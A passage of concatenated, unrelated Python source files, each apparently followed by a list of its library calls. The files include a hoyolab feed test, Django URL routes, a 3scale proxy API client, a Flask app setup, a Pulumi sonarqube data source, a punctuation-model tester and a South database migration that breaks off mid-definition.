    Tuple[bool, str]
        Whether the plot passed every applicable validator, and a
        newline-joined string of the messages for the failed validations
        (empty when the plot is valid).
    """
    plot_type = svl_plot["type"]
    failures = [
        message
        for plots, invalid, message in PLOT_VALIDATORS
        if (plot_type in plots) and invalid(svl_plot)
    ]
    return (not failures), "\n".join(failures)
| [
"toolz.get"
] | [((1666, 1683), 'toolz.get', 'get', (['"""step"""', 'x', '(1)'], {}), "('step', x, 1)\n", (1669, 1683), False, 'from toolz import get\n'), ((1787, 1804), 'toolz.get', 'get', (['"""bins"""', 'x', '(1)'], {}), "('bins', x, 1)\n", (1790, 1804), False, 'from toolz import get\n'), ((551, 566), 'toolz.get', 'get', (['"""x"""', 'x', '{}'], {}), "('x', x, {})\n", (554, 566), False, 'from toolz import get\n'), ((589, 604), 'toolz.get', 'get', (['"""y"""', 'x', '{}'], {}), "('y', x, {})\n", (592, 604), False, 'from toolz import get\n'), ((627, 645), 'toolz.get', 'get', (['"""axis"""', 'x', '{}'], {}), "('axis', x, {})\n", (630, 645), False, 'from toolz import get\n'), ((787, 802), 'toolz.get', 'get', (['"""x"""', 'x', '{}'], {}), "('x', x, {})\n", (790, 802), False, 'from toolz import get\n'), ((830, 845), 'toolz.get', 'get', (['"""y"""', 'x', '{}'], {}), "('y', x, {})\n", (833, 845), False, 'from toolz import get\n'), ((873, 891), 'toolz.get', 'get', (['"""axis"""', 'x', '{}'], {}), "('axis', x, {})\n", (876, 891), False, 'from toolz import get\n'), ((1511, 1530), 'toolz.get', 'get', (['"""hole"""', 'x', '(0.0)'], {}), "('hole', x, 0.0)\n", (1514, 1530), False, 'from toolz import get\n'), ((1540, 1559), 'toolz.get', 'get', (['"""hole"""', 'x', '(0.0)'], {}), "('hole', x, 0.0)\n", (1543, 1559), False, 'from toolz import get\n')] |
from hoyolab import main
from os import environ
from os.path import exists
import atoma
def init_environ(d):
    """Point the hoyolab feed writer's environment at directory *d*.

    Output files are placed under *d*; the published URLs are the bare
    file names and the entry count is pinned to one.
    """
    environ.update({
        'HOYOLAB_JSON_PATH': '{}/hoyolab.json'.format(d),
        'HOYOLAB_ATOM_PATH': '{}/hoyolab.xml'.format(d),
        'HOYOLAB_JSON_URL': 'hoyolab.json',
        'HOYOLAB_ATOM_URL': 'hoyolab.xml',
        'HOYOLAB_ENTRIES': '1',
    })
def test_feeds(tmpdir):
    # Arrange: point the feed generator at pytest's per-test temp directory.
    init_environ(tmpdir)
    json_path = environ['HOYOLAB_JSON_PATH']
    atom_path = environ['HOYOLAB_ATOM_PATH']
    # Expected total: HOYOLAB_ENTRIES per section, times 3 — presumably three
    # hoyolab post categories; confirm against hoyolab.main.
    num_entries = int(environ['HOYOLAB_ENTRIES']) * 3
    main()
    assert exists(json_path)
    assert exists(atom_path)
    # Both output feeds must parse cleanly and carry the expected item count.
    json_feed = atoma.parse_json_feed_file(json_path)
    assert len(json_feed.items) == num_entries
    atom_feed = atoma.parse_atom_file(atom_path)
    assert len(atom_feed.entries) == num_entries
| [
"os.path.exists",
"atoma.parse_json_feed_file",
"hoyolab.main",
"atoma.parse_atom_file"
] | [((571, 577), 'hoyolab.main', 'main', ([], {}), '()\n', (575, 577), False, 'from hoyolab import main\n'), ((590, 607), 'os.path.exists', 'exists', (['json_path'], {}), '(json_path)\n', (596, 607), False, 'from os.path import exists\n'), ((619, 636), 'os.path.exists', 'exists', (['atom_path'], {}), '(atom_path)\n', (625, 636), False, 'from os.path import exists\n'), ((654, 691), 'atoma.parse_json_feed_file', 'atoma.parse_json_feed_file', (['json_path'], {}), '(json_path)\n', (680, 691), False, 'import atoma\n'), ((757, 789), 'atoma.parse_atom_file', 'atoma.parse_atom_file', (['atom_path'], {}), '(atom_path)\n', (778, 789), False, 'import atoma\n')] |
from django.urls import path
from . import views as sg
urlpatterns = [
    # One route per listing view in the sausage-grinder app, plus the index
    # at the app root.
    path('artist', sg.artist),
    path('genre', sg.genre),
    path('release', sg.release),
    path('track', sg.track),
    path('', sg.sausage_grinder_index),
]
| [
"django.urls.path"
] | [((77, 102), 'django.urls.path', 'path', (['"""artist"""', 'sg.artist'], {}), "('artist', sg.artist)\n", (81, 102), False, 'from django.urls import path\n'), ((108, 131), 'django.urls.path', 'path', (['"""genre"""', 'sg.genre'], {}), "('genre', sg.genre)\n", (112, 131), False, 'from django.urls import path\n'), ((137, 164), 'django.urls.path', 'path', (['"""release"""', 'sg.release'], {}), "('release', sg.release)\n", (141, 164), False, 'from django.urls import path\n'), ((170, 193), 'django.urls.path', 'path', (['"""track"""', 'sg.track'], {}), "('track', sg.track)\n", (174, 193), False, 'from django.urls import path\n'), ((199, 233), 'django.urls.path', 'path', (['""""""', 'sg.sausage_grinder_index'], {}), "('', sg.sausage_grinder_index)\n", (203, 233), False, 'from django.urls import path\n')] |
from FitnessPlot import FitnessPlot
'''
for n in range(1,6):
    plot = FitnessPlot(folder_prefix='data_top{}'.format(n))
    plot.plot_all_workers()
    plot.plot_workers_as_average()
'''
# Build the plot helper for the top-1 run and, for each worker entry, print
# the key followed by its last recorded value.
plot = FitnessPlot(folder_prefix='data_top1', num_workers=16)
worker_dict = plot.create_worker_dict()
#plot.plot_all_workers()
#plot.plot_workers_as_average()
#print(worker_dict)
for key,value in worker_dict.items():
    # NOTE(review): dict_len is unused unless the commented block below is
    # re-enabled.
    dict_len = len(value)
    #if dict_len < 100:
    #    print(key)
    #    print(dict_len)
    print(key)
    # Last entry of value; if value is a sequence this is simply
    # value[-1] — TODO confirm the value type from FitnessPlot.
    print(value[len(value)-1])
| [
"FitnessPlot.FitnessPlot"
] | [((199, 253), 'FitnessPlot.FitnessPlot', 'FitnessPlot', ([], {'folder_prefix': '"""data_top1"""', 'num_workers': '(16)'}), "(folder_prefix='data_top1', num_workers=16)\n", (210, 253), False, 'from FitnessPlot import FitnessPlot\n')] |
import logging
def setup_logger():
    """Configure root logging: INFO level, millisecond-timestamped lines.

    The previous implementation passed one format to ``basicConfig``
    (padded ``%(levelname)-8s``) and then immediately replaced the
    handler's formatter with a slightly different one, and indexed
    ``root.handlers[0]`` unconditionally — an IndexError when
    ``basicConfig`` installed no handler.  The format is now defined once
    and the override is guarded.
    """
    fmt = '%(asctime)s.%(msecs)03d %(levelname)s %(message)s'
    datefmt = '%Y-%m-%d %H:%M:%S'
    logging.basicConfig(level=logging.INFO, format=fmt, datefmt=datefmt)
    root = logging.getLogger()
    # basicConfig is a no-op when handlers already exist, so force the
    # intended format onto the first handler when there is one.
    if root.handlers:
        root.handlers[0].setFormatter(logging.Formatter(fmt, datefmt))
| [
"logging.basicConfig",
"logging.Formatter",
"logging.getLogger"
] | [((54, 149), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s.%(msecs)03d %(levelname)s %(message)s"""', '"""%Y-%m-%d %H:%M:%S"""'], {}), "('%(asctime)s.%(msecs)03d %(levelname)s %(message)s',\n '%Y-%m-%d %H:%M:%S')\n", (71, 149), False, 'import logging\n'), ((184, 324), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': '"""%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(level=logging.INFO, format=\n '%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n", (203, 324), False, 'import logging\n'), ((374, 393), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (391, 393), False, 'import logging\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""ThreeScale Proxies Rule interface for APIs."""
from .base import ThreeScale
import logging
import requests
import xmltodict
import json
logger = logging.getLogger(__name__)
class Proxies(ThreeScale):
    """ThreeScale Proxies create/update client.

    Wraps the 3scale Account Management API endpoints that manage a
    service's proxy configuration: updating the proxy settings, replacing
    the policy chain, and promoting a sandbox configuration to production.
    """

    response = None  # Last successful API response (parsed XML dict or requests.Response).

    def __init__(self):
        """Initialize object."""
        super().__init__()
        # Remembered by update() so later calls can default to the same service.
        self.service_id = None

    def update(self,
               tracker,
               service_id,
               api_backend,
               credentials_location='query',
               auth_app_key='user_key',
               endpoint=None,
               auth_app_id=None,
               auth_user_key=None,
               error_auth_failed=None,
               error_status_auth_failed=None,
               error_headers_auth_failed=None,
               error_auth_missing=None,
               error_status_auth_missing=None,
               error_headers_auth_missing=None,
               error_no_match=None,
               error_status_no_match=None,
               error_headers_no_match=None,
               oidc_issuer_endpoint=None,
               sandbox_endpoint=None
               ):
        """Update the proxy configuration of *service_id*.

        On success stores the parsed XML response in ``self.response`` and
        returns it; on failure logs the error and rolls back via *tracker*.
        """
        self.service_id = service_id
        request_body = {
            'access_token': self._access_token,
            "api_backend": api_backend,
            "credentials_location": credentials_location,
            "auth_app_key": auth_app_key,
            "endpoint": endpoint,
            "auth_app_id": auth_app_id,
            "auth_user_key": auth_user_key,
            "error_auth_failed": error_auth_failed,
            "error_status_auth_failed": error_status_auth_failed,
            "error_headers_auth_failed": error_headers_auth_failed,
            "error_auth_missing": error_auth_missing,
            "error_status_auth_missing": error_status_auth_missing,
            "error_headers_auth_missing": error_headers_auth_missing,
            "error_no_match": error_no_match,
            "error_status_no_match": error_status_no_match,
            "error_headers_no_match": error_headers_no_match,
            "oidc_issuer_endpoint": oidc_issuer_endpoint,
            "sandbox_endpoint": sandbox_endpoint,
        }
        # Only PATCH the parameters that were actually set.
        # NOTE(review): this also drops explicitly-falsy values such as
        # empty strings — confirm that is intended.
        request_body = {k: v for k, v in request_body.items() if v}

        _url = self._build_url(
            self._endpoints.proxy_update.format(service_id=service_id))
        _resp = requests.patch(_url, data=request_body)
        logger.info("[PATCH] {} with STATUS CODE: {}".format(
            _url, _resp.status_code))
        if _resp.ok:
            self.response = xmltodict.parse(
                _resp.content, dict_constructor=dict)
            logger.info(
                "Successfully Updated Proxy: {}".format(api_backend))
            return self.response
        else:
            logger.error("Update Proxy FAILED {} with STATUS CODE {}".format(
                _url, _resp.status_code))
            logger.error("FAILED RESPONSE: {}".format(_resp.content))
            tracker._rollback()

    def _get_highest_version(self, service_id=None, environment='sandbox'):
        """Return the highest proxy-config version for the service.

        Falls back to version 2 when the list cannot be fetched or is
        empty (previously an empty list silently returned None, which was
        then formatted into the promote URL).
        """
        service_id = service_id or self.service_id
        params = {
            'access_token': self._access_token,
        }
        _url = self._build_url(
            self._endpoints.proxy_config_list.format(service_id=service_id,
                                                     environment=environment))
        _resp = requests.get(_url, params=params)
        logger.info("[GET] {} with STATUS CODE: {}".format(
            _url, _resp.status_code))
        if _resp.ok:
            output = _resp.json()
            if output:
                highest_version = max([conf.get('proxy_config', {}).get('version', 2)
                                       for conf in output.get('proxy_configs', {})])
                logger.info("HIGHEST Version: {}".format(highest_version))
                return highest_version
        else:
            logger.error("Unable to fetch the latest version.")
        # Consistent fallback for both the error case and an empty listing.
        return 2

    def policy_update(self, tracker, headers, service_id=None):
        """Update the Proxy Policy Configuration.

        Replaces the service's policy chain with a single built-in
        "headers" policy that applies *headers* to requests.
        """
        policies_config = [{
            "name": "headers",
            "configuration": {
                "response": [],
                "request": headers},
            "version": "builtin",
            "enabled": True
        }]
        service_id = service_id or self.service_id
        request_body = {
            'access_token': self._access_token,
            'service_id': service_id,
            'policies_config': json.dumps(policies_config)
        }

        _url = self._build_url(
            self._endpoints.proxy_policy_update.format(service_id=service_id))
        _resp = requests.put(_url, data=request_body)
        logger.info("[PUT] {} with STATUS CODE: {}".format(
            _url, _resp.status_code))
        if _resp.ok:
            self.response = _resp
            logger.info("Successfully Updated Proxy Policy Config")
            return self.response
        else:
            logger.error("Update Proxy Policy Config FAILED {} with STATUS CODE {}".format(
                _url, _resp.status_code))
            logger.error("FAILED RESPONSE: {}".format(_resp.content))
            tracker._rollback()

    def proxy_promote(self, tracker,
                      service_id=None,
                      environment='sandbox',
                      to='production'):
        """Promote the highest proxy config of *environment* to *to*."""
        service_id = service_id or self.service_id
        # Forward service/environment so the version lookup targets the same
        # config list being promoted (previously used only the defaults).
        version = self._get_highest_version(service_id=service_id,
                                            environment=environment)
        request_body = {
            'access_token': self._access_token,
            'to': to
        }
        _url = self._build_url(
            self._endpoints.proxy_config_promote.format(service_id=service_id,
                                                        environment=environment,
                                                        version=version))
        _resp = requests.post(_url, data=request_body)
        logger.info("[POST] {} with STATUS CODE: {}".format(
            _url, _resp.status_code))
        if _resp.ok:
            self.response = _resp
            logger.info("Successfully Promoted Proxy to {}".format(to))
            return self.response
        else:
            logger.error("Promote Proxy FAILED {} with STATUS CODE {}".format(
                _url, _resp.status_code))
            logger.error("FAILED RESPONSE: {}".format(_resp.content))
            tracker._rollback()

    def find(self):
        """Find the Proxy (not implemented)."""
        raise NotImplementedError("Method find Not Implemented.")

    def __repr__(self):
        """Representation of class."""
        # NOTE(review): assumes self.response is the parsed dict set by
        # update(); policy_update/proxy_promote store a requests.Response
        # instead — confirm before relying on repr after those calls.
        api_backend = self.response.get('proxy', {}).get('api_backend')
        # Fixed: previously said "Class Mappings(id=...)", copied from the
        # Mappings client.
        return "Class Proxies(api_backend={})".format(api_backend)
| [
"logging.getLogger",
"requests.post",
"xmltodict.parse",
"requests.patch",
"json.dumps",
"requests.get",
"requests.put"
] | [((198, 225), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (215, 225), False, 'import logging\n'), ((2457, 2496), 'requests.patch', 'requests.patch', (['_url'], {'data': 'request_body'}), '(_url, data=request_body)\n', (2471, 2496), False, 'import requests\n'), ((3491, 3524), 'requests.get', 'requests.get', (['_url'], {'params': 'params'}), '(_url, params=params)\n', (3503, 3524), False, 'import requests\n'), ((4829, 4866), 'requests.put', 'requests.put', (['_url'], {'data': 'request_body'}), '(_url, data=request_body)\n', (4841, 4866), False, 'import requests\n'), ((6070, 6108), 'requests.post', 'requests.post', (['_url'], {'data': 'request_body'}), '(_url, data=request_body)\n', (6083, 6108), False, 'import requests\n'), ((2648, 2701), 'xmltodict.parse', 'xmltodict.parse', (['_resp.content'], {'dict_constructor': 'dict'}), '(_resp.content, dict_constructor=dict)\n', (2663, 2701), False, 'import xmltodict\n'), ((4664, 4691), 'json.dumps', 'json.dumps', (['policies_config'], {}), '(policies_config)\n', (4674, 4691), False, 'import json\n')] |
# Created with tutorials:
# https://www.digitalocean.com/community/tutorials/how-to-structure-large-flask-applications
# http://flask.pocoo.org/docs/0.12/tutorial
from flask import Flask, g, render_template
from flask_sqlalchemy import SQLAlchemy
import sqlite3
# Define WSGI application object.
# Define WSGI application object.
app = Flask(__name__)

# Configurations: baseline from the 'config' module, optionally overridden by
# the file named in the CONFIG environment variable (silently skipped if unset).
app.config.from_object('config')
app.config.from_envvar('CONFIG', silent=True)

# Define database object.
db = SQLAlchemy(app)


@app.errorhandler(404)
def not_found(error):
    # App-wide 404 handler: render the shared template with the 404 status.
    return render_template('404.html'), 404

# Import a module / component using its blueprint handler variable (mod_auth)
from app.api.entries.controllers import mod as entries_module
from app.site.controllers import mod as site_module

# Register blueprint(s)
app.register_blueprint(entries_module)
app.register_blueprint(site_module)
# app.register_blueprint(xyz_module)
# ..

# Build the database:
# This will create the database file using SQLAlchemy
db.create_all()
| [
"flask.render_template",
"flask_sqlalchemy.SQLAlchemy",
"flask.Flask"
] | [((306, 321), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (311, 321), False, 'from flask import Flask, g, render_template\n'), ((451, 466), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (461, 466), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((524, 551), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (539, 551), False, 'from flask import Flask, g, render_template\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'GetUsersResult',
'AwaitableGetUsersResult',
'get_users',
'get_users_output',
]
@pulumi.output_type
class GetUsersResult:
    """
    A collection of values returned by getUsers.
    """
    # Generated output type: __init__ only validates each raw invoke result
    # and stashes it via pulumi.set; reads go through the typed properties.
    def __init__(__self__, email=None, id=None, is_local=None, login_name=None, name=None):
        if email and not isinstance(email, str):
            raise TypeError("Expected argument 'email' to be a str")
        pulumi.set(__self__, "email", email)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if is_local and not isinstance(is_local, bool):
            raise TypeError("Expected argument 'is_local' to be a bool")
        pulumi.set(__self__, "is_local", is_local)
        if login_name and not isinstance(login_name, str):
            raise TypeError("Expected argument 'login_name' to be a str")
        pulumi.set(__self__, "login_name", login_name)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def email(self) -> str:
        return pulumi.get(self, "email")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The provider-assigned unique ID for this managed resource.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter(name="isLocal")
    def is_local(self) -> bool:
        return pulumi.get(self, "is_local")

    @property
    @pulumi.getter(name="loginName")
    def login_name(self) -> str:
        return pulumi.get(self, "login_name")

    @property
    @pulumi.getter
    def name(self) -> str:
        return pulumi.get(self, "name")
class AwaitableGetUsersResult(GetUsersResult):
    # Generated awaitable shim: the result is already resolved, so __await__
    # yields nothing and immediately returns a plain GetUsersResult.  The
    # dead "if False: yield" exists only to make this function a generator.
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return GetUsersResult(
            email=self.email,
            id=self.id,
            is_local=self.is_local,
            login_name=self.login_name,
            name=self.name)
def get_users(login_name: Optional[str] = None,
              opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetUsersResult:
    """
    Use this data source to access information about an existing resource.

    :param login_name: Login name used to look up the sonarqube user
           (sent as the ``loginName`` invoke argument).
    :param opts: Options to control the invoke's behavior.
    """
    __args__ = dict()
    __args__['loginName'] = login_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Synchronous invoke against the provider; .value blocks until resolved.
    __ret__ = pulumi.runtime.invoke('sonarqube:index/getUsers:getUsers', __args__, opts=opts, typ=GetUsersResult).value

    return AwaitableGetUsersResult(
        email=__ret__.email,
        id=__ret__.id,
        is_local=__ret__.is_local,
        login_name=__ret__.login_name,
        name=__ret__.name)
@_utilities.lift_output_func(get_users)
def get_users_output(login_name: Optional[pulumi.Input[str]] = None,
                     opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetUsersResult]:
    """
    Use this data source to access information about an existing resource.
    """
    # Body intentionally empty: lift_output_func wraps get_users so it
    # accepts pulumi Inputs/Outputs; this stub only supplies the signature.
    ...
| [
"pulumi.get",
"pulumi.getter",
"pulumi.set",
"pulumi.InvokeOptions",
"pulumi.runtime.invoke"
] | [((1788, 1817), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""isLocal"""'}), "(name='isLocal')\n", (1801, 1817), False, 'import pulumi\n'), ((1914, 1945), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""loginName"""'}), "(name='loginName')\n", (1927, 1945), False, 'import pulumi\n'), ((766, 802), 'pulumi.set', 'pulumi.set', (['__self__', '"""email"""', 'email'], {}), "(__self__, 'email', email)\n", (776, 802), False, 'import pulumi\n'), ((920, 950), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (930, 950), False, 'import pulumi\n'), ((1088, 1130), 'pulumi.set', 'pulumi.set', (['__self__', '"""is_local"""', 'is_local'], {}), "(__self__, 'is_local', is_local)\n", (1098, 1130), False, 'import pulumi\n'), ((1272, 1318), 'pulumi.set', 'pulumi.set', (['__self__', '"""login_name"""', 'login_name'], {}), "(__self__, 'login_name', login_name)\n", (1282, 1318), False, 'import pulumi\n'), ((1442, 1476), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (1452, 1476), False, 'import pulumi\n'), ((1554, 1579), 'pulumi.get', 'pulumi.get', (['self', '"""email"""'], {}), "(self, 'email')\n", (1564, 1579), False, 'import pulumi\n'), ((1745, 1767), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (1755, 1767), False, 'import pulumi\n'), ((1865, 1893), 'pulumi.get', 'pulumi.get', (['self', '"""is_local"""'], {}), "(self, 'is_local')\n", (1875, 1893), False, 'import pulumi\n'), ((1994, 2024), 'pulumi.get', 'pulumi.get', (['self', '"""login_name"""'], {}), "(self, 'login_name')\n", (2004, 2024), False, 'import pulumi\n'), ((2101, 2125), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (2111, 2125), False, 'import pulumi\n'), ((2797, 2819), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (2817, 2819), False, 'import pulumi\n'), ((2911, 3015), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', 
(['"""sonarqube:index/getUsers:getUsers"""', '__args__'], {'opts': 'opts', 'typ': 'GetUsersResult'}), "('sonarqube:index/getUsers:getUsers', __args__, opts=\n opts, typ=GetUsersResult)\n", (2932, 3015), False, 'import pulumi\n')] |
import logging
import os
import tensorflow as tf
from punc_recover.models.punc_transformer import PuncTransformer
from punc_recover.tester.base_tester import BaseTester
from utils.text_featurizers import TextFeaturizer
class PuncTester(BaseTester):
    """Evaluation runner for the punctuation-restoration Transformer.

    (The original docstring said "Trainer for CTC Models" — apparently
    copied from another tester.)
    """
    def __init__(self,
                 config,
                 ):
        super(PuncTester, self).__init__(config['running_config'])
        self.model_config = config['model_config']
        # Input-token and punctuation-label vocabularies.
        self.vocab_featurizer = TextFeaturizer(config['punc_vocab'])
        self.bd_featurizer = TextFeaturizer(config['punc_biaodian'])
        self.opt_config = config['optimizer_config']
        # Running mean of per-batch masked accuracy over the eval set.
        self.eval_metrics = {
            "acc": tf.keras.metrics.Mean(),
        }
    def _eval_step(self, batch):
        # One evaluation step: predict punctuation for a (tokens, labels)
        # batch and accumulate the masked accuracy.
        x, labels = batch
        mask = self.creat_mask(x)
        pred_bd = self.model.inference(x, mask)
        acc=self.classes_acc(labels,pred_bd)
        self.eval_metrics["acc"].update_state(acc)
    def creat_mask(self, seq):
        # Attention padding mask: 1.0 where seq == 0 (pad token), broadcastable
        # over attention heads.
        seq_pad = tf.cast(tf.equal(seq, 0), tf.float32)
        return seq_pad[:, tf.newaxis, tf.newaxis, :]  # (batch_size, 1, 1, seq_len)
    def classes_acc(self, real, pred):
        # Sparse categorical accuracy averaged over non-pad positions
        # (real == 0 is treated as padding), then averaged over the batch.
        mask = tf.math.logical_not(tf.math.equal(real, 0))
        accs = tf.keras.metrics.sparse_categorical_accuracy(real,pred)
        mask = tf.cast(mask, dtype=accs.dtype)
        accs *= mask
        final=tf.reduce_sum(accs,-1)/tf.reduce_sum(mask,-1)
        return tf.reduce_mean(final)
    def compile(self, ):
        # Build the model from config, restore the newest checkpoint, and
        # print a summary.
        self.model = PuncTransformer(num_layers=self.model_config['num_layers'],
                                     d_model=self.model_config['d_model'],
                                     enc_embedding_dim=self.model_config['enc_embedding_dim'],
                                     num_heads=self.model_config['num_heads'],
                                     dff=self.model_config['dff'],
                                     input_vocab_size=self.vocab_featurizer.num_classes,
                                     bd_vocab_size=self.bd_featurizer.num_classes,
                                     pe_input=self.model_config['pe_input'],
                                     rate=self.model_config['rate'])
        self.model._build()
        self.load_checkpoint()
        # NOTE(review): this logs unconditionally, even when load_checkpoint
        # succeeded — the message looks misleading; verify intent.
        logging.info('trainer resume failed')
        self.model.summary(line_length=100)
    def run(self, ):
        self._eval_batches()

    def load_checkpoint(self, ):
        """Load checkpoint."""
        self.checkpoint_dir = os.path.join(self.running_config["outdir"], "checkpoints")
        files = os.listdir(self.checkpoint_dir)
        # Checkpoints are named ..._<step>.h5; sort numerically by step and
        # restore the newest one.
        files.sort(key=lambda x: int(x.split('_')[-1].replace('.h5', '')))
        self.model.load_weights(os.path.join(self.checkpoint_dir, files[-1]))
| [
"utils.text_featurizers.TextFeaturizer",
"os.listdir",
"tensorflow.equal",
"tensorflow.reduce_sum",
"tensorflow.keras.metrics.Mean",
"os.path.join",
"tensorflow.keras.metrics.sparse_categorical_accuracy",
"tensorflow.math.equal",
"tensorflow.reduce_mean",
"punc_recover.models.punc_transformer.Punc... | [((507, 543), 'utils.text_featurizers.TextFeaturizer', 'TextFeaturizer', (["config['punc_vocab']"], {}), "(config['punc_vocab'])\n", (521, 543), False, 'from utils.text_featurizers import TextFeaturizer\n'), ((573, 612), 'utils.text_featurizers.TextFeaturizer', 'TextFeaturizer', (["config['punc_biaodian']"], {}), "(config['punc_biaodian'])\n", (587, 612), False, 'from utils.text_featurizers import TextFeaturizer\n'), ((1277, 1333), 'tensorflow.keras.metrics.sparse_categorical_accuracy', 'tf.keras.metrics.sparse_categorical_accuracy', (['real', 'pred'], {}), '(real, pred)\n', (1321, 1333), True, 'import tensorflow as tf\n'), ((1349, 1380), 'tensorflow.cast', 'tf.cast', (['mask'], {'dtype': 'accs.dtype'}), '(mask, dtype=accs.dtype)\n', (1356, 1380), True, 'import tensorflow as tf\n'), ((1478, 1499), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['final'], {}), '(final)\n', (1492, 1499), True, 'import tensorflow as tf\n'), ((1546, 1968), 'punc_recover.models.punc_transformer.PuncTransformer', 'PuncTransformer', ([], {'num_layers': "self.model_config['num_layers']", 'd_model': "self.model_config['d_model']", 'enc_embedding_dim': "self.model_config['enc_embedding_dim']", 'num_heads': "self.model_config['num_heads']", 'dff': "self.model_config['dff']", 'input_vocab_size': 'self.vocab_featurizer.num_classes', 'bd_vocab_size': 'self.bd_featurizer.num_classes', 'pe_input': "self.model_config['pe_input']", 'rate': "self.model_config['rate']"}), "(num_layers=self.model_config['num_layers'], d_model=self.\n model_config['d_model'], enc_embedding_dim=self.model_config[\n 'enc_embedding_dim'], num_heads=self.model_config['num_heads'], dff=\n self.model_config['dff'], input_vocab_size=self.vocab_featurizer.\n num_classes, bd_vocab_size=self.bd_featurizer.num_classes, pe_input=\n self.model_config['pe_input'], rate=self.model_config['rate'])\n", (1561, 1968), False, 'from punc_recover.models.punc_transformer import 
PuncTransformer\n'), ((2309, 2346), 'logging.info', 'logging.info', (['"""trainer resume failed"""'], {}), "('trainer resume failed')\n", (2321, 2346), False, 'import logging\n'), ((2539, 2597), 'os.path.join', 'os.path.join', (["self.running_config['outdir']", '"""checkpoints"""'], {}), "(self.running_config['outdir'], 'checkpoints')\n", (2551, 2597), False, 'import os\n'), ((2614, 2645), 'os.listdir', 'os.listdir', (['self.checkpoint_dir'], {}), '(self.checkpoint_dir)\n', (2624, 2645), False, 'import os\n'), ((715, 738), 'tensorflow.keras.metrics.Mean', 'tf.keras.metrics.Mean', ([], {}), '()\n', (736, 738), True, 'import tensorflow as tf\n'), ((1049, 1065), 'tensorflow.equal', 'tf.equal', (['seq', '(0)'], {}), '(seq, 0)\n', (1057, 1065), True, 'import tensorflow as tf\n'), ((1238, 1260), 'tensorflow.math.equal', 'tf.math.equal', (['real', '(0)'], {}), '(real, 0)\n', (1251, 1260), True, 'import tensorflow as tf\n'), ((1416, 1439), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['accs', '(-1)'], {}), '(accs, -1)\n', (1429, 1439), True, 'import tensorflow as tf\n'), ((1439, 1462), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['mask', '(-1)'], {}), '(mask, -1)\n', (1452, 1462), True, 'import tensorflow as tf\n'), ((2753, 2797), 'os.path.join', 'os.path.join', (['self.checkpoint_dir', 'files[-1]'], {}), '(self.checkpoint_dir, files[-1])\n', (2765, 2797), False, 'import os\n')] |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: add an integer ``cc_version`` column
    (default 0) to the core ``Product`` and ``ProductVersion`` models."""

    def forwards(self, orm):
        # Apply: create the new cc_version columns, defaulting existing rows to 0.
        # Adding field 'ProductVersion.cc_version'
        db.add_column('core_productversion', 'cc_version', self.gf('django.db.models.fields.IntegerField')(default=0), keep_default=False)

        # Adding field 'Product.cc_version'
        db.add_column('core_product', 'cc_version', self.gf('django.db.models.fields.IntegerField')(default=0), keep_default=False)

    def backwards(self, orm):
        # Revert: drop the columns added in forwards().
        # Deleting field 'ProductVersion.cc_version'
        db.delete_column('core_productversion', 'cc_version')

        # Deleting field 'Product.cc_version'
        db.delete_column('core_product', 'cc_version')

    # Frozen ORM snapshot used by South to build the ``orm`` argument passed
    # to forwards()/backwards(). Auto-generated — do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
